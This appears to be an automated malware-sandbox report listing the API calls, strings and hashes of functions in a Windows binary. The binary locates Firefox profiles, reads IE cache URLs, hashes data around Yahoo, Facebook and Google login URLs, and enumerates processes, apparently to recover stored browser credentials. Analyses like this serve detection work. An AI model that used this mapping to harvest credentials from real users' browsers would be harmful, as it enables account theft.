Opcode Fuzzy Hash: 9d98e6f2fbb5c69645150cf5077508ab95bdd3e46f00e280708d5f032f5596ec
Instruction Fuzzy Hash: B5B1A271540388AFEF11DF64CC89BCA7FA5AF55304F0404BAFA48AF292C7B99544CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00403768, Relevance: 36.1, APIs: 24, Instructions: 84windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0040E076: memset.MSVCRT ref: 0040E0B9
Part of subcall function 0040E076: memset.MSVCRT ref: 0040E0CE
Part of subcall function 0040E076: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 0040E0E0
Part of subcall function 0040E076: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 0040E0FE
Part of subcall function 0040E076: SendMessageW.USER32(?,00001003,00000001,?), ref: 0040E13B
Part of subcall function 0040E076: ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 0040E14F
Part of subcall function 0040E076: ImageList_SetImageCount.COMCTL32(00000000,00000008), ref: 0040E15A
Part of subcall function 0040E076: SendMessageW.USER32(?,00001003,00000000,?), ref: 0040E172
Part of subcall function 0040E076: ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040E17E
Part of subcall function 0040E076: GetModuleHandleW.KERNEL32(00000000), ref: 0040E18D
Part of subcall function 0040E076: LoadImageW.USER32 ref: 0040E19F
Part of subcall function 0040E076: GetModuleHandleW.KERNEL32(00000000), ref: 0040E1AA
Part of subcall function 0040E076: LoadImageW.USER32 ref: 0040E1BC
Part of subcall function 0040E076: ImageList_SetImageCount.COMCTL32(?,00000000), ref: 0040E1CD
Part of subcall function 0040E076: GetSysColor.USER32(0000000F), ref: 0040E1D5

GetModuleHandleW.KERNEL32(00000000), ref: 0040377A
LoadIconW.USER32(00000000,00000072), ref: 00403785
ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 00403796
GetModuleHandleW.KERNEL32(00000000), ref: 0040379A
LoadIconW.USER32(00000000,00000074), ref: 0040379F
ImageList_ReplaceIcon.COMCTL32(?,00000001,00000000), ref: 004037AA
GetModuleHandleW.KERNEL32(00000000), ref: 004037AE
LoadIconW.USER32(00000000,00000073), ref: 004037B3
ImageList_ReplaceIcon.COMCTL32(?,00000002,00000000), ref: 004037BE
GetModuleHandleW.KERNEL32(00000000), ref: 004037C2
LoadIconW.USER32(00000000,00000075), ref: 004037C7
ImageList_ReplaceIcon.COMCTL32(?,00000003,00000000), ref: 004037D2
GetModuleHandleW.KERNEL32(00000000), ref: 004037D6
LoadIconW.USER32(00000000,0000006F), ref: 004037DB
ImageList_ReplaceIcon.COMCTL32(?,00000004,00000000), ref: 004037E6
GetModuleHandleW.KERNEL32(00000000), ref: 004037EA
LoadIconW.USER32(00000000,00000076), ref: 004037EF
ImageList_ReplaceIcon.COMCTL32(?,00000005,00000000), ref: 004037FA
GetModuleHandleW.KERNEL32(00000000), ref: 004037FE
LoadIconW.USER32(00000000,00000077), ref: 00403803
ImageList_ReplaceIcon.COMCTL32(?,00000006,00000000), ref: 0040380E
GetModuleHandleW.KERNEL32(00000000), ref: 00403812
LoadIconW.USER32(00000000,00000070), ref: 00403817
ImageList_ReplaceIcon.COMCTL32(?,00000007,00000000), ref: 00403822

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: IconImage$List_$HandleLoadModule$Replace$CountCreateMessageSendmemset$ColorDirectoryFileInfoWindows
String ID:
API String ID: 715923342-0
Opcode ID: 620d69d8077533c60e47300747d931a5e3fb9ffd49415cf9926755a482ff0520
Instruction ID: b7e10a9324f3d83bf9194ece928487740f847c1137f1a2c01f1b8e69b6e47de2
Opcode Fuzzy Hash: 620d69d8077533c60e47300747d931a5e3fb9ffd49415cf9926755a482ff0520
Instruction Fuzzy Hash: 1711F160B857087AFA3137B2DC4BF7B7A5EDF81B85F114414F35D990E0C9E6AC105928

Uniqueness

Uniqueness Score: -1.00%

Function 00443D20, Relevance: 33.4, APIs: 8, Strings: 11, Instructions: 139COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(0040BDC4,?,00000000), ref: 00443D36
??2@YAPAXI@Z.MSVCRT ref: 00443D51
GetFileVersionInfoW.VERSION(0040BDC4,00000000,?,00000000,00000000,0040BDC4,?,00000000), ref: 00443D61
VerQueryValueW.VERSION(00000000,0044A4B4,0040BDC4,?,0040BDC4,00000000,?,00000000,00000000,0040BDC4,?,00000000), ref: 00443D74
VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0044A4B4,0040BDC4,?,0040BDC4,00000000,?,00000000,00000000,0040BDC4,?,00000000), ref: 00443DB1
_snwprintf.MSVCRT ref: 00443DD1
wcscpy.MSVCRT ref: 00443DFB
??3@YAXPAX@Z.MSVCRT ref: 00443EAB

Strings

LegalCopyright, xrefs: 00443E7D
CompanyName, xrefs: 00443E53
FileDescription, xrefs: 00443E14
FileVersion, xrefs: 00443E29
ProductVersion, xrefs: 00443E3E
040904E4, xrefs: 00443DF5
OriginalFileName, xrefs: 00443E92
\VarFileInfo\Translation, xrefs: 00443DAB
%4.4X%4.4X, xrefs: 00443DC6
ProductName, xrefs: 00443E02
InternalName, xrefs: 00443E68

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileInfoQueryValueVersion$??2@??3@Size_snwprintfwcscpy
String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
API String ID: 1223191525-1542517562
Opcode ID: f160691ecdb482a839b0d8bd7ec2443cf0dfcac9d5922b70f5c8bd6361710c8c
Instruction ID: f644ee0d2354bfc8442d092a800b66c1527b1609597f5fb91e8fdc391f94498a
Opcode Fuzzy Hash: f160691ecdb482a839b0d8bd7ec2443cf0dfcac9d5922b70f5c8bd6361710c8c
Instruction Fuzzy Hash: 164133B2900218BAEB04EFA1DD82DDEB7BCAF48704F110517B515A3142DB78EA559BA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040E076, Relevance: 33.1, APIs: 22, Instructions: 137windowCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040E0B9
memset.MSVCRT ref: 0040E0CE
GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 0040E0E0
SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 0040E0FE
ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040E117
ImageList_SetImageCount.COMCTL32(00000000,00000008), ref: 0040E122
SendMessageW.USER32(?,00001003,00000001,?), ref: 0040E13B
ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 0040E14F
ImageList_SetImageCount.COMCTL32(00000000,00000008), ref: 0040E15A
SendMessageW.USER32(?,00001003,00000000,?), ref: 0040E172
ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040E17E
GetModuleHandleW.KERNEL32(00000000), ref: 0040E18D
LoadImageW.USER32 ref: 0040E19F
GetModuleHandleW.KERNEL32(00000000), ref: 0040E1AA
LoadImageW.USER32 ref: 0040E1BC
ImageList_SetImageCount.COMCTL32(?,00000000), ref: 0040E1CD
GetSysColor.USER32(0000000F), ref: 0040E1D5
ImageList_AddMasked.COMCTL32(?,00000000,00000000), ref: 0040E1F0
ImageList_AddMasked.COMCTL32(?,?,?), ref: 0040E200
DeleteObject.GDI32(?), ref: 0040E20C
DeleteObject.GDI32(?), ref: 0040E212
SendMessageW.USER32(00000000,00001208,00000000,?), ref: 0040E22F

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Image$List_$CountCreateMessageSend$DeleteHandleLoadMaskedModuleObjectmemset$ColorDirectoryFileInfoWindows
String ID:
API String ID: 304928396-0
Opcode ID: 0e0f0537c5a9146dc27172f456af1fd8f34a183f9f4551b6ad3cfb99057e354f
Instruction ID: d1f198460081c9bd407666b3734bdbb6004887ae833e7bd4338906f330e243fe
Opcode Fuzzy Hash: 0e0f0537c5a9146dc27172f456af1fd8f34a183f9f4551b6ad3cfb99057e354f
Instruction Fuzzy Hash: F241E975640704BFEB20AF70DC4AF9777ADFB09705F000829F399A91D1CAF5A8508B29

Uniqueness

Uniqueness Score: -1.00%

Function 00406B51, Relevance: 31.7, APIs: 13, Strings: 5, Instructions: 198registrytimeCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00406B72

Part of subcall function 00413E4F: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,004145EB,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,?), ref: 00413E62

_wcsnicmp.MSVCRT ref: 00406BE5
memset.MSVCRT ref: 00406C09
memset.MSVCRT ref: 00406C25
_snwprintf.MSVCRT ref: 00406C45
wcsrchr.MSVCRT ref: 00406C6C
CompareFileTime.KERNEL32(?,?,00000000), ref: 00406C9F
wcscpy.MSVCRT ref: 00406CC1
memset.MSVCRT ref: 00406BBF

Part of subcall function 00413EE6: RegEnumKeyExW.ADVAPI32(00000000,00411799,00411799,?,00000000,00000000,00000000,00411799,00411799,00000000), ref: 00413F09

RegCloseKey.ADVAPI32(00411799), ref: 00406CF9
wcscpy.MSVCRT ref: 00406D07
ExpandEnvironmentStringsW.KERNEL32(%programfiles%\Mozilla Firefox,?,00000104,?,?,?,?,00000000,?), ref: 00406D22
GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,00000000,?), ref: 00406D62

Strings

%s\bin, xrefs: 00406C34
%programfiles%\Mozilla Firefox, xrefs: 00406D1D
mozilla, xrefs: 00406BDF
SOFTWARE\Mozilla, xrefs: 00406B8E
PathToExe, xrefs: 00406C4A

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memset$wcscpy$CloseCompareCurrentDirectoryEnumEnvironmentExpandFileOpenStringsTime_snwprintf_wcsnicmpwcsrchr
String ID: %programfiles%\Mozilla Firefox$%s\bin$PathToExe$SOFTWARE\Mozilla$mozilla
API String ID: 1094916163-2797892316
Opcode ID: 07749401729549ea18023a88aae6b7e086f03ff84713cd47a7d93030012f0eb7
Instruction ID: 3a0c8bae75b73356f025c28445405007b897e2e36fb84af6dfbdfac580efd4a0
Opcode Fuzzy Hash: 07749401729549ea18023a88aae6b7e086f03ff84713cd47a7d93030012f0eb7
Instruction Fuzzy Hash: 9961BBB2D04229AAEF20EBA1CC45BDF77BCFF45344F010476E909F2181EB795A548B59

Uniqueness

Uniqueness Score: -1.00%

Function 00414847, Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00414869
memset.MSVCRT ref: 0041487E
wcscpy.MSVCRT ref: 004148B0
_snwprintf.MSVCRT ref: 004148D0
wcscat.MSVCRT ref: 004148DD
_snwprintf.MSVCRT ref: 0041490C
wcscat.MSVCRT ref: 00414919
wcscat.MSVCRT ref: 00414927
wcscat.MSVCRT ref: 00414939
wcscat.MSVCRT ref: 00414944
wcscat.MSVCRT ref: 00414956
wcscat.MSVCRT ref: 00414968

Strings

</font>, xrefs: 00414962
<b>, xrefs: 00414933
</b>, xrefs: 00414950
size="%d", xrefs: 004148BF
color="#%s", xrefs: 004148FB
<font, xrefs: 004148AA

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: wcscat$_snwprintfmemset$wcscpy
String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
API String ID: 3143752011-1996832678
Opcode ID: fea471720f089f9426c79df6b96a0c1db0a5d7cfe671986570c98e4288bdff5f
Instruction ID: 7b6d47d0ae84673c1440bb3f6a45a38d491a9b2de853a8b7013f3412f20213e7
Opcode Fuzzy Hash: fea471720f089f9426c79df6b96a0c1db0a5d7cfe671986570c98e4288bdff5f
Instruction Fuzzy Hash: FC31B9B6504305BAF720EA55DD86EAB73BCDBC1714F20406FF214B2182EB7C99858A5D

Uniqueness

Uniqueness Score: -1.00%

Function 004118EA, Relevance: 31.5, APIs: 9, Strings: 9, Instructions: 41libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,00409807,?,000000FF,00000000,00000104), ref: 004118FD
GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00411914
GetProcAddress.KERNEL32(NtLoadDriver), ref: 00411926
GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00411938
GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041194A
GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 0041195C
GetProcAddress.KERNEL32(NtQueryObject), ref: 0041196E
GetProcAddress.KERNEL32(NtSuspendProcess), ref: 00411980
GetProcAddress.KERNEL32(NtResumeProcess), ref: 00411992

Strings

NtResumeProcess, xrefs: 00411982
NtSuspendProcess, xrefs: 00411970
ntdll.dll, xrefs: 004118F8
NtQueryObject, xrefs: 0041195E
NtOpenSymbolicLinkObject, xrefs: 0041193A
NtUnloadDriver, xrefs: 00411928
NtQuerySymbolicLinkObject, xrefs: 0041194C
NtQuerySystemInformation, xrefs: 00411909
NtLoadDriver, xrefs: 00411916

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
API String ID: 667068680-2887671607
Opcode ID: d8ef7826caabcaaffc412af8f074007f850e332e68426ef7b20180a0e9148960
Instruction ID: 49f1c8a85f5507baf9409120c02bba5f1b3352987f0cf3d6caa0177263683d24
Opcode Fuzzy Hash: d8ef7826caabcaaffc412af8f074007f850e332e68426ef7b20180a0e9148960
Instruction Fuzzy Hash: 6C01C8F5D80314BADB216FB1AC8AA053EA5F71C7D3710883BE42452272D778C610CE9C

Uniqueness

Uniqueness Score: -1.00%

Function 0040D399, Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040D3BA
memset.MSVCRT ref: 0040D3E4
memset.MSVCRT ref: 0040D3FA
memset.MSVCRT ref: 0040D410
_snwprintf.MSVCRT ref: 0040D449
wcscpy.MSVCRT ref: 0040D494
_snwprintf.MSVCRT ref: 0040D521
wcscat.MSVCRT ref: 0040D553

Part of subcall function 00414777: _snwprintf.MSVCRT ref: 0041479B

wcscpy.MSVCRT ref: 0040D535
_snwprintf.MSVCRT ref: 0040D592

Strings

</table><p>, xrefs: 0040D5B6
 , xrefs: 0040D54D
<table border="1" cellpadding="5">, xrefs: 0040D451
<font color="%s">%s</font>, xrefs: 0040D514
nowrap, xrefs: 0040D48E
bgcolor="%s", xrefs: 0040D43B
<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s, xrefs: 0040D3C2

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _snwprintfmemset$wcscpy$wcscat
String ID: bgcolor="%s"$ nowrap$ $</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
API String ID: 1607361635-601624466
Opcode ID: 9c4e98fc668ec826f20e0b002b8e58c954f250be10c1ab6a9c58bcae2153cd4d
Instruction ID: 86ecdfe433e0374b5ced7b433421c6295f8700cac4d68a1fbb2313435c6baabf
Opcode Fuzzy Hash: 9c4e98fc668ec826f20e0b002b8e58c954f250be10c1ab6a9c58bcae2153cd4d
Instruction Fuzzy Hash: 6561A171900208EFEF14EF94CC85EAE7B79EF45314F1001AAF815A72D2DB38AA55CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040D9D6, Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040D9FC
memset.MSVCRT ref: 0040DA11
memset.MSVCRT ref: 0040DA26
_snwprintf.MSVCRT ref: 0040DA55
_snwprintf.MSVCRT ref: 0040DA84
wcscpy.MSVCRT ref: 0040DA95
_snwprintf.MSVCRT ref: 0040DAB5
memset.MSVCRT ref: 0040DAF4
_snwprintf.MSVCRT ref: 0040DB15
_snwprintf.MSVCRT ref: 0040DB4F

Part of subcall function 00414777: _snwprintf.MSVCRT ref: 0041479B

Strings

</font>, xrefs: 0040DA8F
<th%s>%s%s%s, xrefs: 0040DB3E
<font color="%s">, xrefs: 0040DA73
bgcolor="%s", xrefs: 0040DA44
<table border="1" cellpadding="5"><tr%s>, xrefs: 0040DAA4
width="%s", xrefs: 0040DB04

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _snwprintf$memset$wcscpy
String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
API String ID: 2000436516-3842416460
Opcode ID: ca54b146358acc6312ccae977809877886edf0d219006698e2b397220b1af42e
Instruction ID: d19b445dff31b0d86a25f5297df5c333c47444227bfe33656549cbc54b746d40
Opcode Fuzzy Hash: ca54b146358acc6312ccae977809877886edf0d219006698e2b397220b1af42e
Instruction Fuzzy Hash: 1D4142B1D40219AAEB20EF95CC85FFB737CFF45304F4540ABB918A2191E7389A948F65

Uniqueness

Uniqueness Score: -1.00%

Function 00409CB0, Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON

Download Yara Rule

APIs

Part of subcall function 004060BC: _wcsicmp.MSVCRT ref: 004060ED

Part of subcall function 004063BB: memset.MSVCRT ref: 004064B7

free.MSVCRT(00000000), ref: 00409E9F

Part of subcall function 00409755: _wcsicmp.MSVCRT ref: 0040976E

memset.MSVCRT ref: 00409D85

Part of subcall function 00408F43: wcslen.MSVCRT ref: 00408F56
Part of subcall function 00408F43: memcpy.MSVCRT ref: 00408F75

wcschr.MSVCRT ref: 00409DBD
memcpy.MSVCRT ref: 00409DF1
memcpy.MSVCRT ref: 00409E0C
memcpy.MSVCRT ref: 00409E27
memcpy.MSVCRT ref: 00409E42

Strings

AccessCount, xrefs: 00409D21
EntryID, xrefs: 00409D6F
ExpiryTime, xrefs: 00409D3B
AccessedTime, xrefs: 00409D48
CreationTime, xrefs: 00409D2E
Url, xrefs: 00409D62
, xrefs: 00409CE2
ModifiedTime, xrefs: 00409D55

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
API String ID: 3849927982-2252543386
Opcode ID: 25591710af33cd07455ce6db1f3b2dc3e075db32bc947d0e32b1a7c168253070
Instruction ID: 4efc6fce7ce7295637414d4ef923d95a635c1e3a2e0485d2030de31f1e6ccd1f
Opcode Fuzzy Hash: 25591710af33cd07455ce6db1f3b2dc3e075db32bc947d0e32b1a7c168253070
Instruction Fuzzy Hash: 4051FE71D40209ABEB50EFA5DC45B9EB7B8AF54304F15403BB504B72D2EB78AD048B98

Uniqueness

Uniqueness Score: -1.00%

Function 0040BD50, Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 95COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040BD76
memset.MSVCRT ref: 0040BD92

Part of subcall function 00408282: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040BE8F,00000000,0040BD42,?,00000000,00000208,?), ref: 0040828D

Part of subcall function 00443D20: GetFileVersionInfoSizeW.VERSION(0040BDC4,?,00000000), ref: 00443D36
Part of subcall function 00443D20: ??2@YAPAXI@Z.MSVCRT ref: 00443D51
Part of subcall function 00443D20: GetFileVersionInfoW.VERSION(0040BDC4,00000000,?,00000000,00000000,0040BDC4,?,00000000), ref: 00443D61
Part of subcall function 00443D20: VerQueryValueW.VERSION(00000000,0044A4B4,0040BDC4,?,0040BDC4,00000000,?,00000000,00000000,0040BDC4,?,00000000), ref: 00443D74
Part of subcall function 00443D20: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0044A4B4,0040BDC4,?,0040BDC4,00000000,?,00000000,00000000,0040BDC4,?,00000000), ref: 00443DB1
Part of subcall function 00443D20: _snwprintf.MSVCRT ref: 00443DD1
Part of subcall function 00443D20: wcscpy.MSVCRT ref: 00443DFB

wcscpy.MSVCRT ref: 0040BDD6
wcscpy.MSVCRT ref: 0040BDE5
wcscpy.MSVCRT ref: 0040BDF5
EnumResourceNamesW.KERNEL32(0040BEF4,00000004,0040BB24,00000000), ref: 0040BE5A
EnumResourceNamesW.KERNEL32(0040BEF4,00000005,0040BB24,00000000), ref: 0040BE64
wcscpy.MSVCRT ref: 0040BE6C

Strings

RTL, xrefs: 0040BE3B
TranslatorURL, xrefs: 0040BE12
general, xrefs: 0040BDEA
TranslatorName, xrefs: 0040BE01
Version, xrefs: 0040BE28
strings, xrefs: 0040BE66

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: wcscpy$File$EnumInfoNamesQueryResourceValueVersionmemset$??2@ModuleNameSize_snwprintf
String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
API String ID: 3037099051-517860148
Opcode ID: 2fcdf58697040aa4c7eb54e95d53208f650488f18f63fe222914c72976027cdc
Instruction ID: d02a95b1ac945ad733c6c475c60bd1556454897fd3a1253caa6bc47d13ece21f
Opcode Fuzzy Hash: 2fcdf58697040aa4c7eb54e95d53208f650488f18f63fe222914c72976027cdc
Instruction Fuzzy Hash: AD21A9B294021876EB20BB529C46FCB7B6CDF55754F00047BF50871192DBBC9A94C6EE

Uniqueness

Uniqueness Score: -1.00%

Function 00403C2A, Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 33libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(advapi32.dll,?,0040A9C2,?,https://login.yahoo.com/config/login,00000000,http://www.facebook.com/,00000000,https://www.google.com/accounts/servicelogin,00000000,?,00000000,?,00411E75,?,?), ref: 00403C35
GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00403C49
GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00403C55
GetProcAddress.KERNEL32(?,CryptCreateHash), ref: 00403C61
GetProcAddress.KERNEL32(?,CryptGetHashParam), ref: 00403C6D
GetProcAddress.KERNEL32(?,CryptHashData), ref: 00403C79
GetProcAddress.KERNEL32(?,CryptDestroyHash), ref: 00403C85

Strings

CryptDestroyHash, xrefs: 00403C7B
CryptAcquireContextA, xrefs: 00403C41
CryptCreateHash, xrefs: 00403C57
CryptHashData, xrefs: 00403C6F
CryptReleaseContext, xrefs: 00403C4B
advapi32.dll, xrefs: 00403C30
CryptGetHashParam, xrefs: 00403C63

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: CryptAcquireContextA$CryptCreateHash$CryptDestroyHash$CryptGetHashParam$CryptHashData$CryptReleaseContext$advapi32.dll
API String ID: 2238633743-1621422469
Opcode ID: 75ed6b8b2212405dc2e3096810b13c68b16b60bade9346944bfe3eeaaf52b7e4
Instruction ID: d7a6577b60cfc464e8e16958ee64dd601e1a2e2a5708563609cb1b578f097ad1
Opcode Fuzzy Hash: 75ed6b8b2212405dc2e3096810b13c68b16b60bade9346944bfe3eeaaf52b7e4
Instruction Fuzzy Hash: A2F0F974940B44AFEF306F769D49E06BEF0EFA87017214D2EE0C1A3651D7B99100CE48

Uniqueness

Uniqueness Score: -1.00%

Function 00407737, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 184stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00407D7B: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,00444305,00000000,?,00000000,00000000,0041274B,?,?), ref: 00407D8D

GetFileSize.KERNEL32(00000000,00000000,00000000,00000001,00000000,?,00407C89,?,?,?,0000001E), ref: 00407760
??2@YAPAXI@Z.MSVCRT ref: 00407774

Part of subcall function 0040897D: ReadFile.KERNEL32(?,?,CCD,00000000,00000000,?,?,00444343,00000000,00000000), ref: 00408994

memset.MSVCRT ref: 004077A6
memset.MSVCRT ref: 004077C8
memset.MSVCRT ref: 004077DD
strcmp.MSVCRT ref: 0040781C
strcpy.MSVCRT(?,?,?,?,?,?), ref: 004078B2
strcpy.MSVCRT(?,?,?,?,?,?), ref: 004078D1
memset.MSVCRT ref: 004078E5
strcmp.MSVCRT ref: 00407949
??3@YAXPAX@Z.MSVCRT ref: 0040797B
CloseHandle.KERNEL32(?,?,00407C89,?,?,?,0000001E), ref: 00407984

Strings

---, xrefs: 00407943

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memset$File$strcmpstrcpy$??2@??3@CloseCreateHandleReadSize
String ID: ---
API String ID: 3751793120-2854292027
Opcode ID: eca26216cdaf4081c7745029d8611b0e3050f967057ef2bb3d745bbd903b7043
Instruction ID: 5eab4b77d8efc932d29ad1d752f1a4839dd8d7bf75d011c8978729a0abaaed7e
Opcode Fuzzy Hash: eca26216cdaf4081c7745029d8611b0e3050f967057ef2bb3d745bbd903b7043
Instruction Fuzzy Hash: 856159B2C0416D9ADF20EB948C859DEBB7C9B15314F1041FBE518B3141DA385FC4CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00412F99, Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(psapi.dll,?,00411582), ref: 00412FAC
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00412FC5
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00412FD6
GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 00412FE7
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00412FF8
GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413009
FreeLibrary.KERNEL32(00000000), ref: 00413029

Strings

GetModuleBaseNameW, xrefs: 00412FBF
GetModuleInformation, xrefs: 00413003
GetModuleFileNameExW, xrefs: 00412FE1
EnumProcesses, xrefs: 00412FF2
psapi.dll, xrefs: 00412FA7
EnumProcessModules, xrefs: 00412FD0

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$Library$FreeLoad
String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
API String ID: 2449869053-70141382
Opcode ID: cfd5c71916fbce4a342b80b0f76a79ff8ef3fa3daac0bce444ef2cea232ec273
Instruction ID: 777907c91c3138f07d32b7effc6a6e277a0cb3bdfe1d402d2202e46302417196
Opcode Fuzzy Hash: cfd5c71916fbce4a342b80b0f76a79ff8ef3fa3daac0bce444ef2cea232ec273
Instruction Fuzzy Hash: B5014030940715AAD7318F256E44B6A2EE4E759B83B14002BA404D2A5AEBB8D941DBAC

Uniqueness

Uniqueness Score: -1.00%

Function 0040FDE0, Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON

Download Yara Rule

APIs

_wcsicmp.MSVCRT ref: 0040FDE6
_wcsicmp.MSVCRT ref: 0040FDFB

Strings

/scomma, xrefs: 0040FE4A
/sverhtml, xrefs: 0040FDF6
/stab, xrefs: 0040FE20
/skeepass, xrefs: 0040FE5F
/stabular, xrefs: 0040FE35
/sxml, xrefs: 0040FE0B
/shtml, xrefs: 0040FDE1

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _wcsicmp
String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
API String ID: 2081463915-1959339147
Opcode ID: d68f99de9f7ef6dc0a98dc4c4bcb6a836855c619b54ed7beb0ba6369b4841934
Instruction ID: 6ae1867121f1a9de607d4cf96a2848453b881622ab493d5bc2878352e6736150
Opcode Fuzzy Hash: d68f99de9f7ef6dc0a98dc4c4bcb6a836855c619b54ed7beb0ba6369b4841934
Instruction Fuzzy Hash: 4D01EC6328A32164F97469A7AC07F8B0A49CBD2F7AF71543BF904D41C6FF8D944560AC

Uniqueness

Uniqueness Score: -1.00%

Function 00412F15, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,00411589), ref: 00412F24
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00412F3D
GetProcAddress.KERNEL32(00000000,Module32First), ref: 00412F4E
GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00412F5F
GetProcAddress.KERNEL32(00000000,Process32First), ref: 00412F70
